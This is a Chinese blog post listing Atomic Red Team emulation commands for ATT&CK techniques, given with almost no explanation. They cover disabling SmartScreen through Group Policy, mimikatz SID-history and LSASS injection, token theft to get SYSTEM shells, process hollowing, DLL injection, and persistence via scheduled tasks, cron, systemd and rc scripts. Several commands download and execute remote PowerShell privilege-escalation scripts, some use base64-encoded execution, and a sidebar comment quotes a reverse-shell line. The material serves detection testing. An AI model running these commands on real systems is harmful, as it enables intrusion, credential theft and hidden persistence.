-------------------------------------------------------------------------------- T1484.001 DOMAIN POLICY MODIFICATION: GROUP POLICY MODIFICATION * Atomic Test #1 - LockBit Black - Modify Group policy settings -cmd * Atomic Test #2 - LockBit Black - Modify Group policy settings -Powershell LOCKBIT BLACK - MODIFY GROUP POLICY SETTINGS -CMD reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f LOCKBIT BLACK - MODIFY GROUP POLICY SETTINGS -POWERSHELL New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -PropertyType DWord -Value 0 -Force New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -PropertyType DWord -Value 0 -Force New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -PropertyType DWord -Value 0 -Force New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -PropertyType DWord -Value 0 -Force New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force -------------------------------------------------------------------------------- T1134.005 ACCESS TOKEN MANIPULATION: SID-HISTORY INJECTION * Atomic Test #1 - Injection SID-History with mimikatz INJECTION SID-HISTORY WITH MIMIKATZ #{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit" -------------------------------------------------------------------------------- T1134.004 ACCESS TOKEN MANIPULATION: PARENT PID SPOOFING * Atomic Test #1 - Parent PID Spoofing using PowerShell * Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process * Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process * Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe * Atomic Test #5 - Parent PID Spoofing - Spawn from New Process PARENT PID SPOOFING USING POWERSHELL . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 $ppid=Get-Process #{parent_process_name} | select -expand id PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}" PARENT PID SPOOFING - SPAWN FROM CURRENT PROCESS Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid} PARENT PID SPOOFING - SPAWN FROM SPECIFIED PROCESS Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid} PARENT PID SPOOFING - SPAWN FROM SVCHOST. EXE Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = 'svchost.exe' AND CommandLine LIKE '%'" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' PARENT PID SPOOFING - SPAWN FROM NEW PROCESS Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -------------------------------------------------------------------------------- T1134.002 CREATE PROCESS WITH TOKEN * Atomic Test #1 - Access Token Manipulation * Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ACCESS TOKEN MANIPULATION Set-ExecutionPolicy -Scope Process Bypass -Force $owners = @{} gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user} Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}} $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe") WINPWN - GET SYSTEM SHELL - POP SYSTEM SHELL USING TOKEN MANIPULATION TECHNIQUE iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem -------------------------------------------------------------------------------- T1134.001 ACCESS TOKEN MANIPULATION: TOKEN IMPERSONATION/THEFT * Atomic Test #1 - Named pipe client impersonation * Atomic Test #2 - SeDebugPrivilege token duplication * Atomic Test #3 - Launch NSudo Executable * Atomic Test #4 - Bad Potato NAMED PIPE CLIENT IMPERSONATION [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose SEDEBUGPRIVILEGE TOKEN DUPLICATION [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose LAUNCH NSUDO EXECUTABLE Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd" Start-Sleep -Second 5 Stop-Process -Name "cmd" -force -erroraction silentlycontinue BAD POTATO cd PathToAtomicsFolder\..\ExternalPayloads Start-Process .\BadPotato.exe notepad.exe Start-Sleep -Second 20 Stop-Process -Name "notepad" -force -erroraction silentlycontinue Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue -------------------------------------------------------------------------------- T1055 PROCESS INJECTION * Atomic Test #1 - Shellcode execution via VBA * Atomic Test #2 - Remote Process Injection in LSASS via mimikatz * Atomic Test #3 - Section View Injection SHELLCODE EXECUTION VIA VBA [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute" REMOTE PROCESS INJECTION IN LSASS VIA MIMIKATZ #{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" SECTION VIEW INJECTION $notepad = Start-Process notepad -passthru Start-Process $PathToAtomicsFolder\T1055\bin\x64\InjectView.exe -------------------------------------------------------------------------------- T1055.012 PROCESS INJECTION: PROCESS HOLLOWING * Atomic Test #1 - Process Hollowing using PowerShell * Atomic Test #2 - RunPE via VBA PROCESS HOLLOWING USING POWERSHELL . $PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1 $ppid=Get-Process #{parent_process_name} | select -expand id Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose RUNPE VIA VBA [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" -------------------------------------------------------------------------------- T1055.004 PROCESS INJECTION: ASYNCHRONOUS PROCEDURE CALL * Atomic Test #1 - Process Injection via C# PROCESS INJECTION VIA C# PathToAtomicsFolder\T1055.004\bin\T1055.exe| -------------------------------------------------------------------------------- T1055.003 THREAD EXECUTION HIJACKING * Atomic Test #1 - Thread Execution Hijacking THREAD EXECUTION HIJACKING $notepad = Start-Process notepad -passthru Start-Process $PathToAtomicsFolder\T1055.003\bin\InjectContext.exe Start-Sleep -Seconds 5 Stop-Process $notepad.id -------------------------------------------------------------------------------- T1055.001 PROCESS INJECTION: DYNAMIC-LINK LIBRARY INJECTION * Atomic Test #1 - Process Injection via mavinject.exe * Atomic Test #2 - WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique PROCESS INJECTION VIA MAVINJECT. EXE $mypid = #{process_id} mavinject $mypid /INJECTRUNNING #{dll_payload} Stop-Process -processname notepad WINPWN - GET SYSTEM SHELL - BIND SYSTEM SHELL USING USOCLIENT DLL LOAD TECHNIQUE iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1') -------------------------------------------------------------------------------- T1053.007 KUBERNETES CRONJOB * Atomic Test #1 - ListCronjobs * Atomic Test #2 - CreateCronjob LISTCRONJOBS kubectl get cronjobs -n #{namespace} CREATECRONJOB kubectl create -f src/cronjob.yaml -n #{namespace} -------------------------------------------------------------------------------- T1053.006 SCHEDULED TASK/JOB: SYSTEMD TIMERS * Atomic Test #1 - Create Systemd Service and Timer * Atomic Test #2 - Create a user level transient systemd service and timer * Atomic Test #3 - Create a system level transient systemd service and timer CREATE SYSTEMD SERVICE AND TIMER echo "[Unit]" > #{path_to_systemd_service} echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service} echo "[Service]" >> #{path_to_systemd_service} echo "Type=simple" >> #{path_to_systemd_service} echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service} echo "[Install]" >> #{path_to_systemd_service} echo "WantedBy=multi-user.target" >> #{path_to_systemd_service} echo "[Unit]" > #{path_to_systemd_timer} echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer} echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer} echo "[Timer]" >> #{path_to_systemd_timer} echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer} echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer} echo "[Install]" >> #{path_to_systemd_timer} echo "WantedBy=timers.target" >> #{path_to_systemd_timer} systemctl start #{systemd_timer_name} systemctl enable #{systemd_timer_name} systemctl daemon-reload CREATE A USER LEVEL TRANSIENT SYSTEMD SERVICE AND TIMER systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log' CREATE A SYSTEM LEVEL TRANSIENT SYSTEMD SERVICE AND TIMER systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log' -------------------------------------------------------------------------------- T1053.005 SCHEDULED TASK/JOB: SCHEDULED TASK * Atomic Test #1 - Scheduled Task Startup Script * Atomic Test #2 - Scheduled task Local * Atomic Test #3 - Scheduled task Remote * Atomic Test #4 - Powershell Cmdlet Scheduled Task * Atomic Test #5 - Task Scheduler via VBA * Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task * Atomic Test #7 - Scheduled Task Executing Base64 Encoded Commands From Registry * Atomic Test #8 - Import XML Schedule Task with Hidden Attribute * Atomic Test #9 - PowerShell Modify A Scheduled Task SCHEDULED TASK STARTUP SCRIPT schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" SCHEDULED TASK LOCAL SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} SCHEDULED TASK REMOTE SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} POWERSHELL CMDLET SCHEDULED TASK $Action = New-ScheduledTaskAction -Execute "calc.exe" $Trigger = New-ScheduledTaskTrigger -AtLogon $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest $Set = New-ScheduledTaskSettingsSet $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set Register-ScheduledTask AtomicTask -InputObject $object TASK SCHEDULER VIA VBA [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" WMI INVOKE-CIMMETHOD SCHEDULED TASK $xml = [System.IO.File]::ReadAllText("#{xml_path}") Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } SCHEDULED TASK EXECUTING BASE64 ENCODED COMMANDS FROM REGISTRY reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time} IMPORT XML SCHEDULE TASK WITH HIDDEN ATTRIBUTE $xml = [System.IO.File]::ReadAllText("#{xml_path}") Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } POWERSHELL MODIFY A SCHEDULED TASK $Action = New-ScheduledTaskAction -Execute "cmd.exe" $Trigger = New-ScheduledTaskTrigger -AtLogon $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest $Set = New-ScheduledTaskSettingsSet $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set Register-ScheduledTask AtomicTaskModifed -InputObject $object $NewAction = New-ScheduledTaskAction -Execute "Notepad.exe" Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction -------------------------------------------------------------------------------- T1053.003 SCHEDULED TASK/JOB: CRON * Atomic Test #1 - Cron - Replace crontab with referenced file * Atomic Test #2 - Cron - Add script to all cron subfolders * Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder CRON - REPLACE CRONTAB WITH REFERENCED FILE crontab -l > /tmp/notevil echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} CRON - ADD SCRIPT TO ALL CRON SUBFOLDERS echo "#{command}" > /etc/cron.daily/#{cron_script_name} echo "#{command}" > /etc/cron.hourly/#{cron_script_name} echo "#{command}" > /etc/cron.monthly/#{cron_script_name} echo "#{command}" > /etc/cron.weekly/#{cron_script_name} CRON - ADD SCRIPT TO /VAR/SPOOL/CRON/CRONTABS/ FOLDER echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -------------------------------------------------------------------------------- T1053.002 SCHEDULED TASK/JOB: AT * Atomic Test #1 - At.exe Scheduled task * Atomic Test #2 - At - Schedule a job AT.EXE SCHEDULED TASK at 13:20 /interactive cmd AT - SCHEDULE A JOB echo "#{at_command}" | at #{time_spec} -------------------------------------------------------------------------------- T1037.005 BOOT OR LOGON INITIALIZATION SCRIPTS: STARTUP ITEMS * Atomic Test #1 - Add file to Local Library StartupItems ADD FILE TO LOCAL LIBRARY STARTUPITEMS sudo touch /Library/StartupItems/EvilStartup.plist -------------------------------------------------------------------------------- T1037.004 BOOT OR LOGON INITIALIZATION SCRIPTS: RC. COMMON * Atomic Test #1 - rc.common * Atomic Test #2 - rc.common * Atomic Test #3 - rc.local RC. COMMON 1 sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common RC. COMMON 2 filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common sudo chmod +x /etc/rc.common RC. LOCAL filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local sudo chmod +x /etc/rc.local -------------------------------------------------------------------------------- T1037.002 BOOT OR LOGON INITIALIZATION SCRIPTS: LOGON SCRIPT (MAC) * Atomic Test #1 - Logon Scripts - Mac LOGON SCRIPTS - MAC 1. Create the required plist file sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist 2. Populate the plist with the location of your shell script sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh 3. Create the required plist file in the target user's Preferences directory touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist 4. Populate the plist with the location of your shell script defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh -------------------------------------------------------------------------------- T1037.001 BOOT OR LOGON INITIALIZATION SCRIPTS: LOGON SCRIPT (WINDOWS) * Atomic Test #1 - Logon Scripts LOGON SCRIPTS echo "#{script_command}" > #{script_path} REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f 迷茫的人生,需要不断努力,才能看清远方模糊的志向! 分类: 安全 标签: Att&ck , 安全 好文要顶 关注我 收藏该文 皇帽讲绿帽带法技巧 粉丝 - 74 关注 - 6 +加关注 0 0 « 上一篇: Atomic-凭据访问 » 下一篇: Atomic-持久化 posted @ 2023-06-28 13:53 皇帽讲绿帽带法技巧 阅读(41) 评论(0) 编辑 收藏 举报 会员救园 刷新页面返回顶部 登录后才能查看或发表评论,立即 登录 或者 逛逛 博客园首页 【推荐】阿里云金秋云创季:云服务器新秀99元/年,百款产品满减折上折 【推荐】实现有效的信息安全,网络安全需要采取新方案 编辑推荐: · pnpm 管理依赖包是如何节省磁盘空间的? · 深度分析 C# 中 Array 的存储结构 · 如何实现一套简单的 oauth2 授权码类型认证 · 你所不知道的 ASP.NET Core 进阶系列(三) · C# 中 Dictionary< TKey, TValue > 的存储结构分析 阅读排行: · 一套开源、强大且美观的WPF UI控件库 - HandyControl · 自研 Fast.ORM 已全面支持AOT编译 · 在ASP.NET Core 中使用 .NET Aspire 消息传递组件 · .NET周刊【11月第3期 2023-11-19】 · CPF C#跨平台UI框架开源了 公告 昵称: 皇帽讲绿帽带法技巧 园龄: 8年11个月 粉丝: 74 关注: 6 +加关注 < 2023年11月 > 日 一 二 三 四 五 六 29 30 31 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 1 2 3 4 5 6 7 8 9 搜索 常用链接 * 我的随笔 * 我的评论 * 我的参与 * 最新评论 * 我的标签 我的标签 * 安全(125) * 逆向(120) * PMP(51) * 数据安全(36) * 应急响应(21) * Linux(17) * Win32(15) * CISP-DSG(12) * Att&ck(11) * 基线(6) * 更多 随笔分类 (475) * 安全(475) 随笔档案 (500) * 2023年8月(2) * 2023年7月(2) * 2023年6月(9) * 2023年4月(1) * 2023年2月(1) * 2022年12月(2) * 2022年8月(39) * 2022年7月(43) * 2022年6月(23) * 2022年5月(9) * 2022年4月(4) * 2022年3月(12) * 2022年2月(4) * 2022年1月(2) * 2021年12月(20) * 2021年11月(5) * 2021年9月(14) * 2021年8月(8) * 2021年7月(2) * 2021年6月(6) * 2021年5月(13) * 2021年4月(22) * 2021年3月(4) * 2021年2月(2) * 2021年1月(9) * 2020年12月(36) * 2020年11月(27) * 2020年10月(35) * 2020年9月(56) * 2020年8月(34) * 2020年7月(20) * 2020年6月(20) * 2016年12月(2) * 2016年1月(4) * 2015年12月(8) * 更多 阅读排行榜 * 1. Openssh算法协议上的漏洞修复-Diffie-Hellman Key Agreement Protocol 资源管理错误漏洞(CVE-2002-20001) (14053) * 2. hping3使用介绍及DoS测试(3418) * 3. sqlmap从入门到精通-第四章-4-3 使用sqlmap直连MySQL获取webshell(2971) * 4. sqlmap从入门到精通-第五章-5-4 使用sqlmap进行Oracle数据库注入与防御(2876) * 5. 常用的反弹shell脚本(2564) 评论排行榜 * 1. HTB-靶机-Help(4) * 2. HTB-靶机-Ariekei(4) * 3. HTB-靶机-Beep(3) * 4. 滴水逆向-RVA和FOA直接互相转换(2) * 5. 滴水逆向-手动解析PE头&PE头字段说明及课后练习(2) 推荐排行榜 * 1. 《数据安全实践指南》- 数据质量管理(1) * 2. 《数据安全实践指南》- 数据采集安全管理(1) * 3. 端口转发(隧道)工具合集记录(1) * 4. proxytunnel-简易使用(1) * 5. HTB-靶机-FluJab(1) 最新评论 * 1. Re:Vulnhub-靶机-KIOPTRIX: 2014 (#5) * 讲的很好,网上大部分的人都没说msf一把,但是需要UA限制。 * --Master_寒蝉 * 2. Re:sqlmap从入门到精通-第一章-2-4-sqlmap使用攻略及技巧(1) * 你是真的牛 * --半夜求神写代码 * 3. Re:滴水逆向-手动解析PE节表及说明 * 指针本身就为无符号的整型,为啥指针前面要加无符号 * --汁汁小汉堡 * 4. Re:HTB-靶机-OneTwoSeven * 想问问,博主是怎么知道curl的发送规则的? curl -H 'Cookie: PHPSESSID=pe7ckkejqtn5bofpbqp249tmv3' -H 'Host: onetwoseven.... * --xiongacv * 5. Re:HTB-靶机-Ariekei * 这段代码在哪执行啊?本地机?python shocker.py -H 172.24.0.2 --command "/bin/bash -i > /dev/tcp/172.24.0.253/8833 0... * --xiongacv Copyright © 2023 皇帽讲绿帽带法技巧 Powered by .NET 8.0 on Kubernetes 点击右上角即可分享